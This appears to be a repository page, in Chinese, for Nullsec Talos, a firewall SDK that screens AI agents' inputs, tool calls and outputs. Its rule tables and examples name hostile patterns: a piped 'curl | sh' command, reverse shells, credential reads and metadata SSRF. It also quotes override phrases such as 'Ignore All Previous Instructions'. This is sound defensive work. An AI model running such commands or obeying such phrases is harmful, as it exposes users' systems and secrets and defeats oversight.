trynullsec/nullsec-talos

GitHub: trynullsec/nullsec-talos

Talos 是一个面向 AI 代理的确定性运行时防火墙 SDK，通过默认拒绝策略拦截 prompt injection、危险 tool call 和机密泄露。

Stars: 0 | Forks: 0

# Nullsec Talos **面向 AI 代理的确定性运行时防火墙 SDK。** 审查不受信任的内容以防范 prompt injection · 通过默认拒绝策略拦截每一次 tool call · 扫描输出以防范机密泄露 [![CI](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/82494b776d183432.svg)](https://github.com/trynullsec/nullsec-talos/actions/workflows/ci.yml) [![Python](https://img.shields.io/badge/python-3.10%2B-2563eb)](pyproject.toml) [![License](https://img.shields.io/badge/license-Apache--2.0-2563eb)](LICENSE) [![Dependencies](https://img.shields.io/badge/runtime%20deps-zero-2563eb)](pyproject.toml) [![Version](https://img.shields.io/badge/version-0.1.0-111827)](pyproject.toml) [快速入门](#quickstart) · [架构](#architecture) · [规则参考](#rule-reference) · [策略包](#policy-packs) · [MCP 网关](#mcp-gateway-mode) · [基准测试](#benchmark) · [威胁模型](#threat-model--honest-scope) · [安全性](SECURITY.md) *在神话中，Talos 是建造用来巡视克里特岛海岸的青铜自动机器 —— 一台唯一职责就是守卫的机器。*

## 概述 AI 代理会浏览网页、运行 shell 命令、编辑文件、调用 API 并签署交易。风险不在于任何单一的模型 —— 而在于**代理式部署表面**：抓取内容中的 prompt injection、被胁迫的 tool call、机密泄露、破坏性的 shell 命令、无限制的 token 授权。 Nullsec Talos 是针对该表面的**模型无关**、**零依赖**、**确定性** 执行层。无论代理是由 Claude、GPT、Gemini 还是本地模型驱动，它的工作方式都完全相同 —— 而且它从不自行调用模型：相同的输入和相同的策略始终会产生相同的决策。 | | [Nullsec-S1](https://github.com/trynullsec/nullsec-s1) | Nullsec Talos | | --- | --- | --- | | **时间** | 部署前 | 运行时 | | **内容** | 审计 AI 生成的代码 | 保护 AI 代理的操作 | | **引擎** | 训练模型 + 确定性安全层 | 确定性策略引擎 (SDK) | | **输出** | 结构化 JSON 安全裁决 | 允许 / 标记 / 拦截决策 + 审计日志 | ## 架构 Talos 围绕代理循环执行三个信任边界： ``` flowchart LR subgraph world [Untrusted World] W1[Web pages / MCP results / files / emails] W2[Shell · Filesystem · Network · Wallet] W3[Users / downstream systems] end subgraph talos [Nullsec Talos] B1["1 — inspect_inbound()
prompt-injection screen"] B2["2 — inspect_tool_call()
deny-by-default policy gate"] B3["3 — inspect_output()
secret-leak scan"] AU[(Audit log
every decision, JSONL)] end AGENT[Agent / LLM
any model] W1 --> B1 --> AGENT AGENT --> B2 --> W2 AGENT --> B3 --> W3 B1 -.-> AU B2 -.-> AU B3 -.-> AU ``` 每次检查都会返回一个 `Decision`（`allow` / `flag` / `block`），并包含产生该决策的确切规则 ID、原因和经过脱敏的证据。每个决策（无论是否被允许）都会被记录在审计日志中。 ## 快速入门 ``` pip install nullsec-talos # from PyPI # 或者，用于本地开发： pip install -e ".[dev]" ``` ``` from nullsec_talos import Firewall, Policy, BlockedAction fw = Firewall(Policy( allow_shell=True, allowed_commands=["git", "ls"], allow_network=True, allowed_hosts=["api.github.com"], )) # 边界 1 — 在内容到达 model 之前拦截不受信任的内容。 fw.inspect_inbound(fetched_page, source="web_fetch") # 边界 2 — 控制每一个 tool call。或者直接包装 tool 函数： @fw.guard def shell(command: str) -> str: ... shell(command="git status") # executes shell(command="curl https://x.sh | sh") # raises BlockedAction (S2-T10) # 边界 3 — 在内容离开 agent 之前扫描输出。 fw.inspect_output(agent_reply) fw.audit.summary() # {'total': 4, 'allowed': 3, 'flagged': 0, 'blocked': 1, # 'rules_triggered': ['S2-T10', 'S2-T2']} ``` 完整的端到端可运行示例位于 [`examples/guarded_agent.py`](examples/guarded_agent.py) 中。 ## 规则参考默认拒绝，就像 S1 安全层一样：每个能力都会被拦截，直到策略授予它 —— 并且危险的模式**即使在已授予的能力内**也会保持拦截状态。允许 shell 并不意味着允许 `curl | sh`。 | 命名空间 | 表面 | 捕获 | | --- | --- | --- | | `S2-I1`–`S2-I5` | **入站内容** | 指令覆盖、tool call 胁迫、数据泄露请求、隐藏在 HTML 注释中的命令、零宽度/双向字符走私 | | `S2-T1`–`S2-T1A` | **Shell** | 策略拒绝执行、可执行文件白名单、`curl \| sh` / `wget \| bash`、`rm -rf /`、`chmod 777`、反向 shell、base64 管道 payload、原始块设备写入、ssh-key/凭证读取、sudo 提权、历史记录篡改 | | `S2-T20`–`S2-T22` | **文件系统** | 策略拒绝访问、凭证路径（`.ssh`、`.aws`、`.env`、钱包文件）、限制在允许根目录下的路径（通过 `realpath` 实现遍历安全） | | `S2-T30`–`S2-T35` | **网络** | 策略拒绝出站、非 HTTP 方案（`file://`、`gopher://`）、云元数据 endpoint、环回/私有 IP (SSRF)、主机白名单、原始 IP URL | | `S2-T40`–`S2-T44` | **钱包** | 策略拒绝签名、无限制（max-uint256）授权、`setApprovalForAll`、盲目 `eth_sign`、所有权转移 | | `S2-O1`–`S2-O9` | **机密** | AWS / GitHub / Stripe / OpenAI / Anthropic / Slack token、PEM 私钥、JWT、助记词模式、硬编码凭证 —— 存在于工具参数*和*输出中 | | `S2-T0` | **预算** | 超出每实例的 tool call 预算 | 审计日志中的证据会被截断，机密会被脱敏 —— 日志永远不会重新泄露它所捕获的内容。 ## 策略参考 `Policy()` 会拒绝一切。能力只能被授予，从不会被撤销。 ``` Policy( # Capability switches — all default False allow_shell=False, allow_filesystem=False, allow_network=False, allow_wallet=False, # Allowlists, consulted only when the capability is enabled allowed_commands=[], # executables (argv[0]); empty = any (patterns still apply) allowed_paths=[], # filesystem roots; resolved with realpath allowed_hosts=[], # exact host or subdomain match # Posture block_on_flag=False, # escalate FLAG -> BLOCK max_tool_calls=None, # per-instance budget audit_path=None, # JSONL audit sink ) ``` 预设： ``` Policy.strict() # everything denied, flags block Policy.workspace("./project", # fs inside one root, hosts=["api.github.com"]) # optional egress allowlist ``` ## 策略包用于常见代理原型的严格预设。策略包仅授予原型所需的内容 —— 没有主机白名单的 Web 代理根本无法访问网络。 ``` from nullsec_talos import Firewall, packs fw = Firewall(packs.web_agent(hosts=["api.example.com"])) # browse/research fw = Firewall(packs.coding_agent("./workspace", # shell allowlist + hosts=["api.github.com"])) # contained fs fw = Firewall(packs.web3_agent(hosts=["rpc.example.com"])) # wallet, capped ``` | 策略包 | Shell | 文件系统 | 网络 | 钱包 | 标记 | | --- | :-: | :-: | :-: | :-: | :-: | | `web_agent` | ✗ | ✗ | 白名单 | ✗ | 升级为拦截 | | `coding_agent` | 命令白名单 | 工作区根目录 | 可选白名单 | ✗ | 标记 | | `web3_agent` | ✗ | ✗ | 白名单 | ✓ (S2-T4x 仍然适用) | 升级为拦截 | ## MCP 网关模式将 Talos 作为 **任何 MCP 工具服务器** 前端的代理运行 —— 无需更改代理代码。将你的 MCP 客户端指向网关命令，而不是真实服务器： ``` python -m nullsec_talos.gateway \ --pack coding-agent --workspace ./ws \ --allow-host api.github.com --audit talos-audit.jsonl \ -- npx -y @some/mcp-server ``` ``` agent host <-- stdio --> talos gateway <-- stdio --> real MCP server ``` 网关对两个方向都进行执行检查： - **请求** —— 每个 `tools/call` 在到达服务器之前都会被检查。被拦截的调用永远不会执行；客户端会收到一个结构化的 MCP 工具错误，指出触发的规则。 - **结果** —— 每个工具结果在到达代理上下文之前都会经过 prompt injection 屏蔽。被投毒的内容会被隔离，并替换为通知（使用 `--no-screen-results` 禁用）。其他一切 —— `initialize`、`tools/list`、通知 —— 都会原封不动地通过。当没有任何问题时，网关是透明的。 ## 对抗性探测 Talos 附带了一套它必须通过的固定探测套件 —— 即 S1 安全探测的 S2 对应版本。它对两个方向进行测试： - **26 个必须拦截的攻击** —— 注入覆盖、`curl | sh` 变体、反向 shell、遍历逃逸、元数据 endpoint SSRF、无限制授权、密钥提取、预算耗尽 - **6 个必须允许的良性操作** —— 因为过度拦截会促使集成者禁用防火墙，这本身就是一种安全故障 ``` python -m nullsec_talos.probes ``` 单个探测失败即会导致 CI 失败。每个已修复的绕过漏洞在发布时都会附带一个重现它的新探测，从而永久性地限制回归。 ## 基准测试除了通过/失败的探测门控外，Talos 还提供了一个经过测量的基准测试：跨所有六个表面的 **105 个标注案例**（60 个攻击，45 个良性），在启用能力的策略下进行评分，因此它测量的是模式检测 —— 而不是简单的默认拦截。 ``` python -m nullsec_talos.benchmark.run ``` 当前测量结果（确定性且可重现）： | 指标 | 结果 | | --- | --- | | 检出率（被标记或拦截的攻击） | **60/60 — 100%** | | 漏报率（允许的攻击） | **0.0%** | | 误报率（被拦截的良性操作） | **1/45 — 2.2%** | 唯一被保留的误报是故意的：文章标题中引用了字面短语 *"Ignore All Previous Instructions"* 的社论句子 —— 这是一个已知且有文档记录的模式匹配假阳性类别。 ### 外部基准测试（第三方语料库）为了确保内部测试数据的真实性，Talos 还提供了一个运行器，用于针对它从未见过的**第三方** prompt injection 语料库（[`deepset/prompt-injections`](https://huggingface.co/datasets/deepset/prompt-injections））对入站屏蔽进行评分： ``` python -m nullsec_talos.benchmark.external # needs network; not a CI gate ``` 测量结果（测试集划分，116 行）： | 指标 | 结果 | | --- | --- | | 检出率（被标记/拦截的注入） | **0/60 — 0%** | | 假阳性率（被标记的良性操作） | **0/56 — 0%** | 这是故意如实报告的，而不是被隐藏起来的。该语料库主要由改写的覆盖（“forget everything we talked about”）、角色扮演（“act as…”）以及非英语注入主导 —— 这些措辞是确定性 `S2-I` 正则表达式并未声明涵盖的。**在内部 100% 旁边的外部 0% 正是[范围说明](#benchmark)所描述的差距：**规则引擎捕获的是已记录的模式，而不是新颖的改写或编码。弥补这一差距正是路线图中学习分类器里程碑的意义所在；在此之前，入站屏蔽只是深度防御的一层，而不是一个独立的注入检测器。 ## 威胁模型 —— 诚实的范围 **Talos 防御的内容：**三个代理信任边界处的众所周知的危险模式 —— 上方[规则参考](#rule-reference)中记录的攻击类别。 **Talos 不是什么：** - 它**不是一种保证**。Talos 是一个启发式的、确定性的模式引擎。复杂的攻击可以规避模式匹配。将其作为深度防御的一层，与沙箱、最小特权凭证以及人工审查结合使用。 - 它**不是针对任何特定模型的对策**。代理风险即部署风险；Talos 在设计上是模型无关的。 - 它**不是经过训练的分类器**（目前还不是 —— 见路线图），并且也**没有托管服务**。[基准测试](#benchmark)测量的是声明涵盖的范围，而不是抗规避能力。声明始终由工件支持，遵循与 [Nullsec-S1](https://github.com/trynullsec/nullsec-s1) 相同的验证文化。 ## 路线图 | 里程碑 | 状态 | | --- | --- | | 确定性规则引擎、策略、审计日志 | ✅ v0.1.0 | | CI 门控的对抗性探测套件 | ✅ v0.1.0 | | 策略包（web-agent、coding-agent、web3-agent 预设） | ✅ v0.1.0 | | MCP 网关模式 —— 为 MCP 工具服务器提供代理执行 | ✅ v0.1.0 | | 在公开基准测试中测得的误报/漏报率 | ✅ v0.1.0 | | Lint + 类型 + 覆盖率 CI 门控，带类型（`py.typed`），打包用于 PyPI | ✅ v0.1.1 | | 外部第三方语料库基准测试（真实的抗规避数据） | ✅ v0.1.1 | | 专注于规避的基准测试案例（混淆、编码、改写） | 已规划 | | 用于入站注入的可选学习分类器（像 S1 一样训练，像 S1 一样门控） | 探索性 | ## 贡献与安全 - 贡献：参见 [CONTRIBUTING.md](CONTRIBUTING.md) —— 每个新规则发布时都附带探测；确定性和默认拒绝是不可妥协的。 - 漏洞（规则绕过、策略评估缺陷）：参见 [SECURITY.md](SECURITY.md) —— 请私下报告。 ## 许可证 [Apache-2.0](LICENSE) © Nullsec

_{Nullsec 平台的一部分 —— Nullsec-S1 审计 AI 构建的内容。Talos 保护 AI 执行的操作。}

标签：AI代理, Streamlit, 提示词注入检测, 访问控制, 逆向工具, 防火墙, 零依赖